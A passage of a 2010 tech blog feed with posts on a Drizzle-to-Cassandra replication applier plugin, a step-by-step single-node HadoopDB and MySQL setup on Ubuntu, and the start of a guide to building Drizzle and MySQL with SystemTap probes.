previously&lt;/a&gt; gone into great detail on the GPB message definitions and I see no point in duplicating the
great articles Jay has written so I encourage you to read those if you are interested in knowing more about
the GPB message definitions.

&lt;h2&gt;Creating a Simple Cassandra Applier&lt;/h2&gt;

Mainly, what I wanted to do in this article is to go through a simple example to demonstrate the replication
API. Please note that the plugin I'm going to cover for this example is extremely simple and probably
not very useful. Its main purpose is to serve as an example of how to develop a transaction applier plugin
that can apply transactions to a difference database system; in this case Cassandra.
&lt;br&gt;

Our Cassandra applier depends on 2 third-party libraries: 1) &lt;a href="http://incubator.apache.org/thrift"&gt;
thrift&lt;/a&gt; and 2)&lt;a href="http://github.com/posulliv/libcassandra"&gt;libcassandra&lt;/a&gt;. libcassandra is
a C++ wrapper for the thrift interface to Cassandra that I developed a few months ago to make it easier
for me to play with Cassandra when programming in C++. Its not very well tested but suits my purposes just
fine. 
&lt;br&gt;

Given that our plugin depends on some third-party libraries, my &lt;code&gt;plugin.ini&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src="http://gist.github.com/420592.js"&gt;&lt;/script&gt;
&lt;br&gt;

And my &lt;code&gt;plugin.ac&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src="http://gist.github.com/420594.js"&gt;&lt;/script&gt;
&lt;br&gt;

This takes care of my plugin's dependence on third-party libraries during the compilation process. If these
libraries are not present on the system when I compile Drizzle, then this plugin will not be compiled. 
&lt;br&gt;

As mentioned before, the plugin I am developing is a transaction applier. This means the plugin will be
implementing the &lt;code&gt;plugin::TransactionApplier&lt;/code&gt; interface. The main function a plugin implementing
this interface needs to implement is the apply function:

The header file for the CassandraApplier class is defined in a new header file named &lt;code&gt;cassandra_applier.h&lt;/code&gt;
which contains the class declaration that looks like:

&lt;br&gt;
&lt;script src="http://gist.github.com/420596.js"&gt;&lt;/script&gt;
&lt;br&gt;

The implementation is contained within the &lt;code&gt;cassandra_applier.cc&lt;/code&gt; C++ file. The most interesting function in
this file is the plugin's implementation of the &lt;code&gt;apply()&lt;/code&gt; function. In the case of the 
CassandraApplier, this function looks like:

&lt;br&gt;
&lt;script src="http://gist.github.com/420597.js"&gt;&lt;/script&gt;
&lt;br&gt;

One thing worth mentioned about the above function before delving into its details is that we assume
that there is 1 keyspace within Cassandra that we will replicating into. If this keyspace, is not present,
the function will fail. This is mainly because this allowed me to develop this plugin pretty quickly. There
is really no other reason for that. In reality, a more robust plugin would allow the keyspace to be 
configurable. Personally, I would prefer to have a way to specify the keyspace a statement should be 
replicated into specified in the SQL statement so it could be controlled on a per-statement basis. Not a 
major issue but I wanted to point this out in case anyone was wondering.
&lt;br&gt;

Now, the above function first looks at the Transaction message and determines how many Statement messages
are contained within it. Next, we loop through all the Statement messages contained within the Transaction
message. Depending on the type of the Statement message, we perform a different action. Right now, the 
plugin only cares about 3 types of Statements: INSERT, UPDATE, and DELETE.
&lt;br&gt;

However, the action performed for each action is virtualy identical. First the header for that type is
obtained. Next, the table metadata and actual data for the Statement is obtained. We then loop through
each field affected by this Statement. 
&lt;br&gt;

For example, with an INSERT Statement, we loop through each
field affected by the INSERT and obtain the field metadata for that field. We use this to obtain the key
that will be used for insertion in Cassandra. For this simple plugin, the key used by Cassandra is the
primary key of a table. The name of the field is used as a column name in Cassnadra and the value being
inserted for that field is used as the value for that column. The name of the table on which the INSERT
is happening corresponds to a column family name in Cassandra.
&lt;br&gt;

The initialization function for this plugin is pretty straightforward. We allocate memory for a 
CassandraApplier object and add that object the plugin registry:

All the above files I referenced are placed in a directory named cassandra_applier I created in the plugin
directory in the &lt;code&gt;lp:~posulliv/drizzle/rep-cassandra&lt;/code&gt; branch on &lt;a href="http://launchpad.net/drzzle"&gt;
Launchpad&lt;/a&gt;. To download and compile the plugin, perform the following:

&lt;pre&gt;
bzr branch lp:~posulliv/drizzle/rep-cassandra
cd rep-cassandra
export CXXFLAGS=-I/usr/local/include/thrift
./config/autorun.sh
./configure --with-cassandra-applier-plugin
make
&lt;/pre&gt;

If any of the third-part libraries required by the plugin are absent, you will see a message informing you
of that during the configure stage.
&lt;br&gt;

In order to start a Drizzle server from the above branch with the appropriate plugins loaded, I perform
the following:

&lt;pre&gt;
mkdir run
cd run
../drizzled/drizzled --basedir=$PWD \
--datadir=$PWD \
--plugin_add=default_replicator,cassandra_applier \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1
&lt;/pre&gt;

To make sure the correct replication stream is enbabled within Drizzle, I can query the data dictionary 
table Jay created for this purpose:

&lt;pre&gt;
drizzle&gt; select * from data_dictionary.replication_streams;
+--------------------+-------------------+
| REPLICATOR         | APPLIER           |
+--------------------+-------------------+
| default_replicator | cassandra_applier | 
+--------------------+-------------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

Next I'll start up my Cassandra cluster that the applier plugin will work with.

For reference, I'm using Cassandra 0.7 and the Cassandra cluster I used for this article is configured as follows (the 
&lt;code&gt;cassandra.yaml&lt;/code&gt; file):

&lt;br&gt;
&lt;script src="http://gist.github.com/420601.js"&gt;&lt;/script&gt;
&lt;br&gt;

Now, to see the plugin in action, consider the following table in Drizzle:

&lt;pre&gt;
drizzle&gt; create table padraig
    -&gt; (
    -&gt;   a int,
    -&gt;   b varchar(128),
    -&gt;   c varchar(128),
    -&gt;   primary key(a)
    -&gt; );
Query OK, 0 rows affected (0.07 sec)

drizzle&gt; 
&lt;/pre&gt;

And assume we perform the following INSERT statements on the table:

&lt;pre&gt;
drizzle&gt; insert into padraig (a, b) values (1, 'sarah');
Query OK, 1 row affected (0.16 sec)

drizzle&gt; insert into padraig (a, c) values (2, 'nimbus');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; insert into padraig (a, b, c) values (3, 'domhnall', 'tomas');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; 
&lt;/pre&gt;

Now, to see what was inserted in Cassandra, we will use the Cassandra CLI interface:

&lt;pre&gt;
$ ./bin/cassandra-cli 
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
[default@unknown] connect localhost/9160
Connected to: "Drizzle Example Cluster" on localhost/9160
[default@unknown] use drizzle;
Authenticated to keyspace: drizzle
[default@drizzle] get padraig['1']
=&gt; (column=61, value=sarah, timestamp=1275376031524000)
Returned 1 results.
[default@drizzle] get padraig['2'] 
=&gt; (column=62, value=nimbus, timestamp=1275376057537000)
Returned 1 results.
[default@drizzle] get padraig['3']                  
=&gt; (column=62, value=domhnall, timestamp=1275376211981000)
=&gt; (column=61, value=tomas, timestamp=1275376067097000)
Returned 2 results.
[default@drizzle] quit
$
&lt;/pre&gt;

&lt;br&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;

That's about it for this article on Drizzle replication. If interested in more, feel free to ping the Drizzle
mailing list with questions or comments. Parts of replication are still under active development and I know
Jay loves to get feedback from people on the replication API in Drizzle.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/06/01/replication-plugins.html</feedburner:origLink></entry>
 
 <entry>
   <title>Up and Running with HadoopDB</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/xFIMvL25aqo/hadoopdb-mysql.html" />
   <updated>2010-05-10T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2010/05/10/hadoopdb-mysql</id>
   <content type="html">&lt;a href="http://db.cs.yale.edu/hadoopdb/hadoopdb.html"&gt;HadoopDB&lt;/a&gt; is an interesting project going
on at Yale under the &lt;a href="http://dbmsmusings.blogspot.com/"&gt;Prof. Daniel Abadi's&lt;/a&gt; supervision
that I've been meaning to play with for some time now. I initially read the &lt;a
href="http://db.cs.yale.edu/hadoopdb/hadoopdb.pdf"&gt;paper&lt;/a&gt; describing HadoopDB last year and
intended to document how to setup a HadoopDB system using MySQL but I got busy with school work and
never got around to it. Since I have a little more free time now that I've finished my thesis, I
figured it was about time I got down to playing around with HadoopDB and describing how to setup a
HadoopDB system using MySQL as the single node database. With that, I'm going to describe how to get
up and running with HadoopDB. If you have not read the paper before starting, I strongly encourage
you to give it a read. Its very well written and not that difficult to get through.
&lt;br&gt;

In this guide, I'm installing on Ubuntu Server 10.04 64-bit. Thus, I will be using the Ubuntu
package manager heavily. I have not tested on other platforms but a lot of what is described here
should apply to other platforms such as CentOS.
&lt;br&gt;

This guide is only on how to set up a single node system. It would not be difficult to extend what
is contained here for setting up a multi-node system which I may write about in the future.

&lt;h2&gt;Installing Hadoop&lt;/h2&gt;

Before installing Hadoop, Java needs to be installed. As of 10.04, the Sun JDK packages have been
&lt;a
href="http://www.ubuntu.com/getubuntu/releasenotes/1004#Sun%20Java%20moved%20to%20the%20Partner%20repository"&gt;dropped&lt;/a&gt; from the Multiverse section of the Ubuntu archive. You can still install the Sun JDK if you
wish but for this article, I used OpenJDK without issues:

&lt;pre&gt;
sudo apt-get install openjdk-6-jdk
&lt;/pre&gt;

Before getting into the installation of Hadoop, I encourage you to read Michael Noll's in-depth
&lt;a
href="http://www.michael-noll.com/wiki/Running_Hadoop_On_Ubuntu_Linux_(Single-Node_Cluster)"&gt;guide&lt;/a&gt;
to installing Hadoop on Ubuntu. I borrow from his articles a lot here.
&lt;br&gt;

First, create a user account and group that Hadoop will run as:

&lt;pre&gt;
sudo groupadd hadoop
sudo useradd -m -g hadoop -d /home/hadoop -s /bin/bash -c "Hadoop software owner" hadoop
&lt;/pre&gt;

Next, we &lt;a href="http://www.apache.org/dyn/closer.cgi/hadoop/core"&gt;download&lt;/a&gt; Hadoop and create
directories for storing the software and data. For this article, Hadoop 0.20.2 was used:

&lt;pre&gt;
cd /opt
sudo wget http://www.gtlib.gatech.edu/pub/apache/hadoop/core/hadoop-0.20.2/hadoop-0.20.2.tar.gz
sudo tar zxvf hadoop-0.20.2.tar.gz
sudo ln -s /opt/hadoop-0.20.2 /opt/hadoop
sudo chown -R hadoop:hadoop /opt/hadoop /opt/hadoop-0.20.2
sudo mkdir -p /opt/hadoop-data/tmp-base
sudo chown -R hadoop:hadoop /opt/hadoop-data/
&lt;/pre&gt;

Alternatively, Cloudera has created &lt;a href="http://www.cloudera.com/hadoop-deb"&gt;Deb packages&lt;/a&gt;
that can be used if you wish. I have not used them before so can't comment on how they work.
&lt;br&gt;

Next, we need to configure SSH for the hadoop user. This is required by Hadoop in order to manage
any nodes.

&lt;pre&gt;
su - hadoop
ssh-keygen -t rsa
cat $HOME/.ssh/id_rsa.pub &gt;&gt; $HOME/.ssh/authorized_keys
&lt;/pre&gt;

When the ssh-keygen command is run, be sure to leave the passphrase as blank so that you will not be
prompted for a password.
&lt;br&gt;

We will want to update the .bashrc file for the hadoop user with appropriate environment variables
to make administration easier:
&lt;script src="http://gist.github.com/394768.js"&gt;&lt;/script&gt;
&lt;br&gt;

We will cover installing Hive later in this article but for now, leave that environment variable in
there. For the remainder of this article, I will be referring to various locations such as the
Hadoop installation directory using the environment variables defined above.

Next, we want configure Hadoop. There are 3 configuration files in Hadoop that we need to modify:

&lt;ul&gt;
  &lt;li&gt;$HADOOP_CONF/core-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/mapred-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/hdfs-site.xml&lt;/li&gt;
&lt;/ul&gt;

Based on the directory structure I created beforehand, these 3 files looked as follows for me:

&lt;script src="http://gist.github.com/394770.js"&gt;&lt;/script&gt;
&lt;br&gt;

Notice the reference to the HadoopDB XML file. We will cover that later but it is necessary for
using HadoopDB to have that property in your configuration.
&lt;br&gt;

Next, we need to modify the $HADOOP_CONF/hadoop-env.sh file so that the JAVA_HOME variable is
correctly set in that file. Thus, I have the following 2 lines in my hadoop-env.sh file:

&lt;pre&gt;
# The java implementation to use.  Required.
export JAVA_HOME=/usr/lib/jvm/java-6-openjdk
&lt;/pre&gt;

Next, we need to format the Hadoop filesystem:

&lt;pre&gt;
$ hadoop namenode -format
10/05/07 14:24:12 INFO namenode.NameNode: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting NameNode
STARTUP_MSG:   host = hadoop1/127.0.1.1
STARTUP_MSG:   args = [-format]
STARTUP_MSG:   version = 0.20.2
STARTUP_MSG:   build = https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r
911707; compiled by 'chrisdo' on Fri Feb 19 08:07:34 UTC 2010
************************************************************/
10/05/07 14:24:12 INFO namenode.FSNamesystem: fsOwner=hadoop,hadoop
10/05/07 14:24:12 INFO namenode.FSNamesystem: supergroup=supergroup
10/05/07 14:24:12 INFO namenode.FSNamesystem: isPermissionEnabled=true
10/05/07 14:24:12 INFO common.Storage: Image file of size 96 saved in 0 seconds.
10/05/07 14:24:12 INFO common.Storage: Storage directory /opt/hadoop-data/tmp-base/dfs/name has been
successfully formatted.
10/05/07 14:24:12 INFO namenode.NameNode: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down NameNode at hadoop1/127.0.1.1
************************************************************/
$
&lt;/pre&gt;

The above is the output from a successful format. Now, we can finally start our single-node Hadoop
installation:

&lt;pre&gt;
$ start-all.sh
starting namenode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-namenode-hadoop1.out
localhost: starting datanode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-datanode-hadoop1.out
localhost: starting secondarynamenode, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-hadoop1.out
starting jobtracker, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-jobtracker-hadoop1.out
localhost: starting tasktracker, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-tasktracker-hadoop1.out
$
&lt;/pre&gt;

Again, if you don't see output similar to the above, something went wrong. The log files under
/opt/hadoop/logs are quite helpful for trouble-shooting.

&lt;h2&gt;Installing MySQL&lt;/h2&gt;

Installing MySQL is quite simple on Ubuntu. I went with the MySQL Server package:

&lt;pre&gt;
sudo apt-get install mysql-server
&lt;/pre&gt;

We don't need to perform any special configuration of MySQL for HadoopDB. Just make sure to take
note of what password you specify for the root user since we will perform all work with HadoopDB as
the root user (this is not mandatory but what I did to keep things simple).
&lt;br&gt;

Next, we need to install the MySQL JDBC driver. For this article, I used &lt;a
href="http://www.mysql.com/downloads/connector/j/"&gt;Connector J&lt;/a&gt;. After downloading the jar file,
we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp mysql-connector-java-5.1.12-bin.jar $HADOOP_HOME/lib
&lt;/pre&gt;

Its worth noting that in the paper, the authors do say that initially they used MySQL with HadoopDB
but switched to PostgreSQL. The main reason cited is due to the poor join algorithms in MySQL which
I assume to mean the fact that only nested loop join is supported in MySQL. I don't attempt to make
any comparison of HadoopDB running with MySQL versus PostgreSQL but I wanted to point out the
authors observation.

&lt;h2&gt;Download HadoopDB&lt;/h2&gt;

Now we can download HadoopDB. I'm going to download both the jar file and check out the source from
Subversion:
Now we can &lt;a href="http://sourceforge.net/projects/hadoopdb/files/"&gt;download&lt;/a&gt; HadoopDB. After
downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp hadoopdb.jar $HADOOP_HOME/lib
&lt;/pre&gt;

I also checked out the source code from Subversion in case I needed to re-build the jar file at any
time:

&lt;pre&gt;
vn co https://hadoopdb.svn.sourceforge.net/svnroot/hadoopdb hadoopdb
&lt;/pre&gt;

&lt;h2&gt;Install Hive&lt;/h2&gt;

&lt;a href="http://wiki.apache.org/hadoop/Hive"&gt;Hive&lt;/a&gt; is used by HadoopDB as a SQL interface to
their system. Its not a requirement for working with HadoopDB but it is another way to interact with
HadoopDB so I'll cover how to install it.
&lt;br&gt;

First, we need to create directories in HDFS:

&lt;pre&gt;
hadoop fs -mkdir /tmp
hadoop fs -mkdir /user/hive/warehouse
hadoop fs -chmod g+w /tmp
hadoop fs -chmod g+w /user/hive/warehouse
&lt;/pre&gt;

Next, we need to &lt;a href="http://sourceforge.net/projects/hadoopdb/files/"&gt;download&lt;/a&gt; the
SMS_dist tar file from the HadoopDB download page:

&lt;pre&gt;
tar zxvf SMS_dist.tar.gz
sudo mv dist /opt/hive
sudo chown -R hadoop:hadoop hive
&lt;/pre&gt;

Since we already setup the environment variables related to Hive earlier when we were installing
Hadoop, everything we need should now be in our path:

&lt;pre&gt;
$ hive
Hive history file=/tmp/hadoop/hive_job_log_hadoop_201005081717_1990651345.txt
hive&gt; 

create     describe   exit       from       load       quit       set
hive&gt; quit;
$
&lt;/pre&gt;

&lt;h2&gt;Data&lt;/h2&gt;

We want to some data to play around with for testing purposes. For this article, I'm going to use
the data from the &lt;a href="http://database.cs.brown.edu/projects/mapreduce-vs-dbms/"&gt;paper&lt;/a&gt;
published last summer: 'A Comparison of Approaches to Large-Scale Data Analysis'. Documentation on
how to re-produce the benchmarks in that paper are prodivded in the link I gave to the paper. For
this article, since I'm only running one Hadoop node and have absolutely no interest in generating
lots of data I modified the scripts provided to produce tiny amounts of data:

&lt;pre&gt;
svn co http://graffiti.cs.brown.edu/svn/benchmarks/
cd benchmarks/datagen/teragen
&lt;/pre&gt;

Within the benchmarks/datagen/teragen folder, there is a Perl script named teragen.pl that is
reponsible for the generation of data. I modified that script for my purposes to look like:

&lt;script src="http://gist.github.com/394790.js"&gt;&lt;/script&gt;
&lt;br&gt;

We then run the above Perl script to generate data that will be loaded in to HDFS. HadoopDB comes
with a data partitioner that can partition data into a specified number of partitions. This is not
particularly important for this article since we are running a single-node cluster so we only have 1
partition. The idea is that a separate partition can be bulk-loaded into a separate database node
and indexed appropriately. 

For us, we just need to create a database and table in our MySQL database. Since we only have 1
partition, the database name will reflect that. The procedure to load the data set we generated into
our single MySQL node is:

&lt;pre&gt;
hadoop fs -get /data/SortGrep535MB/part-00000 my_file
mysql -u root -ppassword
mysql&gt; create database grep0;
mysql&gt; use grep0;
mysql&gt; create table grep (
    -&gt;   key1 char(10),
    -&gt;   field char(90)
    -&gt; );
load data local infile 'my_file' into table grep fields terminated by '|' (key1, field);
&lt;/pre&gt;

We now have data loaded into both HDFS and MySQL. The data we are working with is from the grep
benchmark which is not the best benchmark for HadoopDB since it is un-structured data. However,
since this article is just about how to setup HadoopDB and not testing its preformance, I didn't
really worry about that much.

&lt;h2&gt;HadoopDB Catalog and Running a Job&lt;/h2&gt;

The HadoopDB catalog is stored as an XML in HDFS. A tool is provided that generates this XML file
from a properties file. For this article, the properties file I used is:

&lt;script src="http://gist.github.com/394798.js"&gt;&lt;/script&gt;
&lt;br&gt;

The machines.txt file must exist and for this article, my machines.txt file had only 1 entry:
localhost
&lt;br&gt;

Then in order to generate the XML file and store it in HDFS, the following is performed:

&lt;pre&gt;
java -cp $HADOOP_HOME/lib/hadoopdb.jar edu.yale.cs.hadoopdb.catalog.SimpleCatalogGenerator \
&gt; Catalog.properties
hadoop dfs -put HadoopDB.xml HadoopDB.xml
&lt;/pre&gt;

Please not that the above tool is quite fragile and expects the input properties file to be in a
certain format with certain fields. Its pretty easy to break the tool which is understandable given
this is a research project.
&lt;br&gt;

We are now ready to run a HadoopDB job! The HadoopDB distribution comes with a bunch of benchmarks
that were used in the paper that was published on HadoopDB. The data I generated in this article
corresponds to the data that was used for their benchmarks so I can use jobs that have already been
written in order to test my setup. 
&lt;br&gt;

I'm using the grep task from the paper to search for a pattern in the data I loaded earlier. Thus,
to kick off a job I do:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
&lt;/pre&gt;

Running the job, I see output like the following:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
10/05/08 18:01:41 INFO exec.DBJobBase: grep_db_job
10/05/08 18:01:41 INFO exec.DBJobBase: SELECT key1, field FROM grep WHERE field LIKE '%%wo%%';
10/05/08 18:01:41 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker,
sessionId=
10/05/08 18:01:41 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments.
Applications should implement Tool for the same.
10/05/08 18:01:41 INFO mapred.JobClient: Running job: job_local_0001
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Data locality failed for
hadoop1.localdomain
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Task from hadoop1.localdomain is connecting
to chunk 0 on host localhost with db url jdbc:mysql://localhost:3306/grep0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: SELECT key1, field FROM grep WHERE field
LIKE '%%wo%%';
10/05/08 18:01:41 INFO mapred.MapTask: numReduceTasks: 0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: DB times (ms): connection = 245, query
execution = 2, row retrieval  = 36
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Rows retrieved = 3
10/05/08 18:01:41 INFO mapred.TaskRunner: Task:attempt_local_0001_m_000000_0 is done. And is in the
process of commiting
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task attempt_local_0001_m_000000_0 is allowed to commit
now
10/05/08 18:01:41 INFO mapred.FileOutputCommitter: Saved output of task
'attempt_local_0001_m_000000_0' to file:/home/hadoop/padraig
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task 'attempt_local_0001_m_000000_0' done.
10/05/08 18:01:42 INFO mapred.JobClient:  map 100% reduce 0%
10/05/08 18:01:42 INFO mapred.JobClient: Job complete: job_local_0001
10/05/08 18:01:42 INFO mapred.JobClient: Counters: 6
10/05/08 18:01:42 INFO mapred.JobClient:   FileSystemCounters
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_READ=115486
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_WRITTEN=130574
10/05/08 18:01:42 INFO mapred.JobClient:   Map-Reduce Framework
10/05/08 18:01:42 INFO mapred.JobClient:     Map input records=3
10/05/08 18:01:42 INFO mapred.JobClient:     Spilled Records=0
10/05/08 18:01:42 INFO mapred.JobClient:     Map input bytes=3
10/05/08 18:01:42 INFO mapred.JobClient:     Map output records=3
10/05/08 18:01:42 INFO exec.DBJobBase: 
grep_db_job JOB TIME : 1747 ms.

$
&lt;/pre&gt;

The results are stored in HDFS and I also specified I wanted the results put in an output directory
named padraig. Inspecting the results I see:

&lt;pre&gt;
$ cd padraig
$ cat part-00000
~k~MuMq=	w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;
vkrvkB8	6i0000000000.h9RSz'&gt;Kfp6l~kE0FV"aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA
]&amp;{`H%]1{E0000000000Z[@egp'h9!	BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7
$
&lt;/pre&gt;

I can verify this result by going the data stored in MySQL and performing the same query on it:

&lt;pre&gt;
mysql&gt; select key1, field from grep where field like '%wo%';
+--------------------------------+------------------------------------------------------------------------------------------+
| key1                           | field
|
+--------------------------------+------------------------------------------------------------------------------------------+
| ~k~MuMq=                       | w0000000000{XSq#Bq6,3xd.tg_Wfa"+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;                             |
| vkrvkB8                        | 6i0000000000.h9RSz'&gt;Kfp6l~kE0FV"aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA |
| ]&amp;{`H%]1{E0000000000Z[@egp'h9! | BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7                            |
+--------------------------------+------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql&gt;
&lt;/pre&gt;

Thus, I can see the same rows were returned by the HadoopDB job.

&lt;h2&gt;Conclusion&lt;/h2&gt;

I didn't get to use the Hive interface to HadoopDB as I had issues getting it going. If I get it
going in the future, I'll likely write about it. HadoopDB is a pretty interesting project and I
enjoyed reading the paper on it a lot. A &lt;a
href="http://cs-www.cs.yale.edu/homes/dna/papers/hadoopdb-demo.pdf"&gt;demo&lt;/a&gt; of HadoopDB will be
given at SIGMOD this year which should be interesting.
&lt;br&gt;

Overall, I think its a pretty interesting project but I'm not sure how active it is. Based on the
fact that a demo is being given at SIGMOD, I'm sure there is research being done on it but compared
to other open source projects its difficult to tell how much development is occuring. I'm sure this
has more to do with the fact that it is a research project first and foremost whose source code just
happens to be available. It would be nice to see a mailing list or something pop up around this
project though. For example, if I wanted to contribute a patch, its not really clear how I should go
about doing that and whether it will be integrated or not. 
&lt;br&gt;

I do think its some interesting research
though and I'll be keeping my eye on it and trying to mess around with it whenever I have spare
time. Next thing I want to look into regarding HadoopDB is hooking it up to the column-orientated
database &lt;a href="http://monetdb.cwi.nl/"&gt;MonetDB&lt;/a&gt; which I will write about if I get the chance.
</content>
 <feedburner:origLink>http://posulliv.github.com//2010/05/10/hadoopdb-mysql.html</feedburner:origLink></entry>
 
 <entry>
   <title>Configuring Drizzle/MySQL for use with SystemTap</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/M4tBs2i1XX4/drizzle-mysql-stap.html" />
   <updated>2010-04-02T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2010/04/02/drizzle-mysql-stap</id>
   <content type="html">In a &lt;a href="http://posulliv.github.com/2010/02/26/installing-stap.html"&gt;previous&lt;/a&gt; post, I went
through the steps involved to install SystemTap on a Linux box. Now, I'd like to show how to
configure drizzle and MySQL for use with SystemTap.&lt;br&gt;

First, of all, you need to make sure the dtrace python script that is used by SystemTap is in your
path. If it is not, then if you are on Ubuntu you need to install the systemtap-sdt-dev package as
mentioned in my last post. Assuming our system is setup correctly, we can build drizzle as follows:

&lt;pre&gt;
$ bzr branch lp:drizzle stap
$ cd stap
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make
&lt;/pre&gt;

The drizzle binary will now have support for static stap probes. In order to verify this and see
what probes are present in drizzle, lets start a drizzle server and list the probes in the server
process:

&lt;pre&gt;
$ cd tests
$ ./dtr --start-and-exit
$ sudo stap -l 'process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("*")'
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__rdlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__wrlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("cursor__unlock__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__row__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("filesort__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__opt__choose__plan__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("connection__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("command__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__exec__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("query__parse__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("select__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("update__done")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("delete__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__start")
process("/home/posulliv/repos/drizzle/uc/drizzled/drizzled").mark("insert__select__start")
$
&lt;/pre&gt;

The argument to your process function should be the path to your drizzle binary.

The process for MySQL is very similar. I'm going to just list the build commands and show the probes
that are present in MySQL:

&lt;pre&gt;
$ bzr branch lp:mysql-server mysql-stap
$ cd mysql-stap
$ ./BUILD/autogen.sh
$ ./configure --enable-dtrace
$ make
$ cd mysql-test
$ ./mtr --start &amp;
